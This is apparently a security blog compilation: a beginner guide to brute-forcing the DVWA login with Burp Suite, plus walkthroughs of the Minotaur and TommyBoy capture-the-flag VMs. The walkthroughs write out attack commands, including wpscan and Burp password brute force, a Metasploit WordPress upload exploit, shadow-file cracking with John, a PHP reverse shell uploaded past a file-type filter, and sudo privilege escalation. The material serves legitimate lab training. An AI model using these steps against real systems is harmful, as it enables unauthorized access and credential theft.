Brute Force Website Login Page using Burpsuite (Beginner Guide)

Hello friends!! This is a beginner guide on Brute Force attack using Brup suite. In this article we had demonsrated login page brute force attack on a web application “DVWA”.

Table of Content

§  Introduction to Brute Force Attack

§  Vector of Brute force Attack

§  What is wordlist or dictionary?

§  Lab Set -up Requirement

§  Password Brute Force Using Sniper Attack

§  Username & Password Brute Force Using Cluster Bomb Attack

Introduction to Brute Force Attack

Brute force play a vital role in web penetration testing because is the simplest method to gain access to a site or server by checking the correct username or password by calculating every possible combination that could generate a username or password.

For example:  You have 3 digits PIN for login into an account but when you forget the PIN, so you  will try different values till the time you identify the right match to unlock the account.

Vector of Brute force Attack

§  Using Default login credential such as admin:admin or admin:password

§  Weak password or PIN such as 123

§  Birth Date or Name such as raj:1111

As per Internet security 8 letter character is considered as the standard number for shortest length of a password because the probability of guessing complex password is much larger. For such reason, there are many software and scripts that reduce manual efforts of guessing password or PIN by generating a wordlist or dictionary.

What is wordlist or dictionary?

Wordlist or dictionary is a collection of words which are quite useful while making brute force attack. There are several tools which let you generate your own dictionary that you can use in brute force attack.

Read the given below articles to know more about wordlist genertaing tools

Comprehensive Guide on Crunch Tool

Comprehensive Guide on Pydictor – A wordlist Generating Tool

Comprehensive Guide on Cupp– A wordlist Generating Tool

Lab Set -up Requirement

Target: DVWA (read from here)

Attacking tool: Installed Burp Suite (Any Platform Windows/Kali Linux)

Password Brute Force Using Sniper Attack

Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks as the alternative to metasploit.

§  To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences.

§  Then select advanced option and further go to Network then select Settings.

§  Now, select Manual proxy Configuration.

Now, on the other hand open DVWA and log into it using its default username and password. Once you log in, click on Brute Force. And also make sure that security is low or medium. When you click on brute force, it will ask you the username and password for login. Now suppose you don’t know the password for login into an account.

To make brute force attack first you need to enter random password and then intercept the browser request using burp suite as explain in next step.

Now open burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off tab.

Then go back to DVWA-Brute Force page and click on login tab.

As you can observe that we have successfully intercepted browser request.

Send the captured data to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Then select Positions tab and follow the below steps:

§  Choose the Attack type as sniper.

§  Click on clear tab to deselect the selected area.

Now select password as shown below in the given image and then click on add tab.

In the above image we have selected password that means we will need a dictionary file for username password. Since I have ready create a dictionary as password.txt but you can create your own dictionary as per your situation.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the password file). Then click on Load button and browse and select your dictionary file for password.

Now all you have to do is go to Intruder menu and select Start attack to launch the brute force attack.

Sit back and relax because now the burp suite will do its work and match the username and password and to give you the correct password for given username.

The moment it will find the correct value, it will have larger the value of length as shown:

Username & Password Brute Force Using Cluster Bomb Attack

In above scenario you saw, how easily we were able to guess the correct password when we knew the username. But what you will do when you don’t know anything, neither username nor password? 

So don’t anxiety while facing such scenario, because Burp suite has many options to shoot brute force attack in various situation, similarly “Cluster Bomb” is the attack type which will help us in brute forcing the username and password filed simultaneously.

Now once again repeat above steps to capture the browser request and this time enter random credential and do not forget to configure burp suite setting before hitting on login tab.

As you can observe that we have successfully intercepted browser request and then send the captured data to the intruder.

Then select Positions tab and follow the below steps:

§  Choose the Attack type as “cluster bomb”.

§  Click on clear tab to deselect the selected area.

§  Then select username and password as shown below in the given image and then click on add tab.

Since in above situation we was making brute force attack on single password field therefore we had uploaded one dictionary for guessing correct password but this we selected two payload position therefore we have you upload two dictionary for username and password respectively.

Therefore set payload 1 along with simple list as payload type and upload username wordlist.

And set payload 2 along with simple list as payload type and upload password wordlist.

Now all you have to do is go to Intruder menu and select Start attack to launch the brute force attack.

Sit back and relax because now the burp suite will do its work and match the username and password and to give you the correct username and password.

The moment it will find the correct value, it will have larger the value of length as shown:

In this article we have used Burp suite for brute force on web application but there so many other famous penetration testing tools that are quite useful in brute force attack. You can follow given below link to read related articles.

Comprehensive Guide on Medusa – A Brute Forcing Tool

Comprehensive Guide on Hydra – A Brute Forcing Tool

HAppY HAckinG!!!

Hack the Minotaur VM (CTF Challenge)

Minotaur is a Boot2Root CTF challenge which helps us improve our skills especially of password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56. We know to think about it i.e.:

One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.

You can download this VM from –> https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

Hints

1. This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
2. One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Penetrating Methodology

§  Network Scanning (Nmap)

§  WordPress scanning & password cracking (wpscan)

§  Generate Password Dictionary (Cewl)

§  Reverse connection (Metasploit)

§  Download shadow.bak and crack Hash (John)

§  Sudo right Privilege escalation

§  Get Root access and capture the flag.

Let’s Start!!!

We will start off by nmap because we already our target IP.

nmap  -A 192.168.56.223

As a result of nmap we can see that the port numbers: 22, 80, 2020 are open. We can use port 22 and 80 to our advantage.

Now we tried to explore through nikto and curl but unfortunately we found nothing of use. So we decided to use dirbuster.

Go to the terminal of kali and type :

dirbuster

It will open the dirbuster. In it, give the url in the Target URL box and select directory-list-2.3-medium.txt file in the File with list of dir box.

It will show you the directory called /bull/  and we open the said directory in our browser.

It will show that there is a blog made in WordPress.  As the blog is in wordpress we can apply WPScan to find usernames and vulnerable themes and plung-ins. To apply WPScan type:

wpscan -u http://192.168.56.223/bull/ --enumerate u --enumerate p 

The command will start executing and it will show you all the plug-ins that is exploitable along with usernames and from its result you will enumerate following information :

One user with the username bully. Also, there is plug-in exploit for Slideshow Gallery.

But we will require username and password to make this exploit work. Now we already have username and all we need is its password and we have no idea where to find it as we have no dictionary or password file. The hint we read previously mentions to the requirement of generating our own wordlist. Therefore we will make a password file using ceWL. To make a password file from CeWL go to your terminal of your kali and type:

cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt

This will create a .txt with list of all the words that have a possibility to be the password for the username bully.

Now to find which its password is we will use BurpSuite. So, apply dictionary attack using burpsuite and the moment it will find the correct password it will change it value of length as shown below:

Now that we know username and password we can use that exploit for the plug-in. And to do so open metasploit and type:

use exploit/unix/webapp/wp_slideshowgallery_upload

 msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.56.223

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /bull/

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user bully

msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password Bighornedbulls

msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit

 As the exploit will run it will give you the session of meterpreter.

After digging more and more we found a flag.txt file and shadow.bak insdie /tmp directory.

cd /tmp

ls

cat flag.txt

Also we got a hint that shadow.bak file could be useful to us. Let’s have look in it.

cat shadow.bak

Lets download it with the help of following command

download shadow.bak /root/Desktop

We will take help of John password cracker to find the passwords:

john shadow.bak

We found the passwords for both heffer and minotaur. Please recall that port number 22 i.e. for ssh was open and we can use it to log in and for this type:

ssh heffer@192.168.56.223

Give the password when asked and further check its directories:

ls -lsa

We found a flag here. Read it.

cat flag.txt

Now in the flag we found another flag along with a hint indicating that the flag is Minotaur. Now we will log in through SSH using minotaur:

ssh minotaur@192.168.56.223

Give the password when asked. And then check for directories:

ls -lsa

There is another flag available. Again read it.

cat flag.txt

Now, we have finally found the first flag along with another hint that is the final flag is in /root/flag.txt now let check sudo right for user Minotaur.

sudo -l

As you can observe Minotaur has ALL privileges therefore let’s moving on, type the following to gain admin access and switch user:

sudo su

Finally we have found the last flag.

cat /root/flag.txt

WOOHOO!!! The flag is captured. Congrats and enjoy!!

Hack the TommyBoy VM (CTF Challenge)

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company “Callahan Auto” in the movie. This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It is a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there are some pretty neat little tricks in there too.

Note from the author:

The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

WalkThrough

Let’s start off with scanning the network to find our target.

We found our target –> 192.168.1.108

Our next step is to scan our target with NMAP. We will apply aggressive scan as it is quick.

nmap -A 192.168.1.108

Result shows us that there are 3 ports opened: 22(ssh), 80(http), 8008(http).

To further explore and find rest of the flags we browsed URL on port 80 and we greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

Let’s use nikto tool to have detailed information of our target. So for this, type the following  :

nikto -h http://192.168.1.108/

By using the nikto command we found out that there is a text file with the name of robots.txt which might contain some useful information. Either we can open it in our browser or can list the contents via the curl command as shown below . And yes, we found our first flag.

curl http://192.168.1.108/robots.txt

Hurrah!!  We got our first flag     B34rcl4ws

I took a look at the main page again, to see if there’s anything of interest in the View source. I found a Youtube link .

I then executed the CURL command which would also give the same results (as view-source) and happen to found a Youtube link. There seems to be no harm in opening it, so let us do that and see if it has some significant information.

Upon opening the Youtube link, we can predict that it has something to do with prehistoric forest. So we decided to use it on the browser as –> 192.168.1.108/prehistoricforext/

http://192.168.1.108/prehistoricforest

And to our luck we found alot of information. First of our information was that the website was made in WordPress

As we found another important clue on the same web page of prehistoric forest we decided to investigate further. And this decision proved right as we found another clue which stated to use /richard instead of /prehistoricforest

Let’s browse with http://192.168.1.108/richard/

http://192.168.1.108/richard/shockedrichard.jpg

This image, being as it is, gave us no clue. So we decided to open it with exif tool .

 Go to www.md5cracker.org  OR http://www.hashkiller.co.uk/ site and crack the md5 code we just discovered. On cracking it we will find that it makes up the word spanky

Output of cracked MD5 hash :

ce154b5a8e59c89732bc25d6a2e6b90b   spanky

Further investigating the same “prehistoricforest” page we found other important things like the text file which contained our second flag.

http://192.168.1.108/prehistoricforest/thisisthesecondflagyayyou.txt

Hurrah!!  We got our 2^nd Flag -   Z4l1nsky

If we further more navigate to the URL http://192.168.1.108/prehistoricforest  and go to a password protected blog ,  then it will prompt for a password. Let’s try and input the password as spanky. Hey we are in !!

We are able to read the blog now , which contains loads of information with the hidden hints. Go through the full page and note down the things to remember :

Upon going through the page , we noted down 2 things (refer below screenshot ) , which could be a way going forward . We will utilize these clues one by one .

1.There is something about nickburns

2. There is an FTP service running and hosted on a Non-standard port . Also the FTP server goes up and down with a regular frequency of 15 mins

Now let’s try to find if the FTP port is open as per the clue provided in the blog . We scanned for the ports before and did not find a FTP port anywhere. So let us scan port by port.

Note : The FTP server was running on a non-standard port and goes on/off every 15 minutes.

nmap –p- -sV  192.168.1.108  --open

We took a guess that he may re-use his username as his password and tried as nickburns: nickburns 

and it was successful !

ftp 192.168.1.108 65534

Upon taking a look at the readme file , we were presented with some additional clues.

cat readme.txt

In the file you will see that he is talking about a subfolder “NickizL33t“. I tried this subdirectory on port 80 but got no success , therefore I tried again on port 8008.

First lets try to access http://192.168.1.108:8008/ and see what is in store for us .

Now if we pay attention and notice it says “only me and Steve Jobs are allowed to look at this stuff” that means we can read the content with iPhone. There is Add-on for Mozilla browser named “User Agent Switcher” which will allow us to read the said file.

When you have added this Add-on. Go to the Tools menu. A drop down menu will appear select Default User Agent and from its select iPhone 3.0 option.

http://192.168.1.108:8008/NickIzL33t/

Now as he is talking about certain .html file . As we have already checked everywhere and didn’t find such file. It’s a possibility that this file was hidden so let’s use DIRBuster or dirb to find it.

Note : Running the below command will take lot of memory and hence it is recommended to upgrade/increase the RAM of your system sufficient enough to run this command .

dirb http://192.168.1.108:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html

Finally. After a long wait , we got the html file - fallon1.html

Upon browsing the URL  http://192.168.1.108:8008/NickIzL33t/fallon1.html and as we can see we got lot of information

Hurrah!!  We got our 3^rd Flag -     TinyHead

Additionally , download the zip file t0msp4ssw0rdz.zip

Also ,lets click on A hint and we will get redirected to http://192.168.1.108:8008/NickIzL33t/hint.txt  where we will find hints about the passwords.

We need to figure out how to create a custom dictionary utilizing the above clues which Nick has given us .It starts with ‘bev’,1 upper case char, 2 numbers, 2 lowercase chars, one symbol and then 1995

bev[A-Z][1–9][1–9][a-z][a-z][symbol]1995

Let’s use crunch utility to create a dictionary with the following command:

crunch 13 13 -t bev,%%@@^1995 -o /root/Desktop/dict.txt

Now we have got our custom dictionary from the clues. Let’s use it to brute force Big Tom’s password file with the help of fcrackzip tool.

cd Downloads/

fcrackzip -u -D -p /root/Desktop/dict.txt t0msp4ssw0rdz.zip

Password = bevH00tr$1995

Unzip the file using the password extracted in the above step :

unzip t0msp4ssw0rdz.zip

Here we will get a file passwords.txt, upon reading the same we will get the output with some usernames and credentials.

cat passwords.txt

Here we need to identify the full password of Callahan Auto Server as it is clearly mentioned that after the “fatguyinalittlecoat“ part there are some numbers ; however the admin doesn’t remember that .

Username: bigtommysenior

Password: fatguyinalittlecoat  

Let’s perform a Wordpress Scan and enumerate the users

wpscan -u http://192.168.1.108/prehistoricforest/ --enumerate u

wpscan -u http://192.168.1.108/prehistoricforest/ --wordlist=/usr/share/wordlists/rockyou.txt --username tom

Password for user ‘tom’ is ‘tomtom1’

I tried finding the credentials for user tommy and it went for quite long ,finally I abandoned it 

Now let’s log in to the Wordpress site http://192.168.1.108/prehistoricforest/wp-admin as user ‘tom’ with the above credentials .Once logged in , we will find a post in the “drafts” folder of the dashboard – my-ess-ess-eight-password

We also got a clue (from my-ess-ess-eight-password – read it as SSH password ) that there is something on SSH port that we may need to look upon going forward !!

So now, we will try to log in with SSH port with the user bigtommysenior with following credentials:

Username: bigtommysenior

Password: fatguyinalittlecoat1938!!

ssh bigtommysenior@192.168.1.108

To see the list of files and folders type :

ls –la

Here we will see a file el-flag-numero-quatro.txt which could be of our interest.Let’s open the same

cat el-flag-numero-quatro.txt

The contents of the file contain the flag data!

Hurrah!!  We got our 4th Flag -   EditButton

In addition we got a clue for 5th flag as well (i.e a name of the file /5.txt)

1.Restoration of the website

Before we go to the last flag, we need to restore the backup first. As seen from the above screenshot there is a callahanbak.bak file , which seems to be a backup file. Lets copy this file to the /var/ww/html directory as follows :

cp callahanbak.bak /var/www/html/index.html

Now try browsing the company website . http://192.168.1.108/index.html . As a result of restoring the backup , we can see that now the website has been restored back to normal.

2. Capture the last flag

(a) Upon exploring more and doing view-source for http://192.168.1.108:8008/NickIzL33t/fallon1.html, we found a clue for a particular folder P4TCH_4D4MS. Let’s append this as a sub-directory to URL http://192.168.1.108:8008/NickIzL33t/

Browse the URL http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/ .It gives an option to upload an image file. This is a clue that we can upload our reverse shell here

We already have existing php-reverse-shell.php file under the path usr/share/webshells/php of Kali Linux. Let’s edit the php-reverse-shell.php file and modify with Kali IP as follows ($ip = ‘192.168.1.107’)

While trying to upload the php file (with PHP extension), we were unable to upload this file and greeted with an error saying only image (JPEG, PNG, GIF) files are allowed.

This means that there is a file extension restriction/filter in place. Let’s try to rename the file extension to .png and see if it works. Yes , upon uploading again we observed  that the file php-reverse-shell.png has been uploaded successfully.

http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/upload.php

(b) We now need to go the uploads folders and change the extension back to its original self (i.e change from .png back to .php).Before that we need to find out where exactly is the uploads folder ?

Upon navigation and more research we found that the following path contains the uploads folder ,which has the php-reverse-shell.png file uploaded by us earlier .

cd /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/

ls

Here we can see the uploads directory which might contain some interesting files

cd uploads/

ls

From the output we can see the file php-reverse-shell.png (uploaded in the earlier step), listed under the uploads directory

Now move/replace the file php-reverse-shell.png with the php-reverse-shell.php as shown below

mv php-reverse-shell.png php-reverse-shell.php

Let’s run the Netcat listener

nc  –lvp  1234

Browse the following URL and we will get the limited shell access

http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php

Now let’s read the content and we will see that .5.txt file is listed here :

ls -la

cat .5.txt

Voila!!  We got our 5th Flag -     Buttcrack

As we have captured all five flags , let’s concatenate all the flags together which is a long string and may eventually help us to open the zip file

String : B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

So, now unzip the zip file:

unzip LOOT.zip

It will prompt for unzip password and we will type the lengthy string (as mentioned above ) as the password . Once the file is unzipped it will contain the last part of the challenge i.e. a text file. Let’s read it and finish this whole thing up :

cat THE-END.txt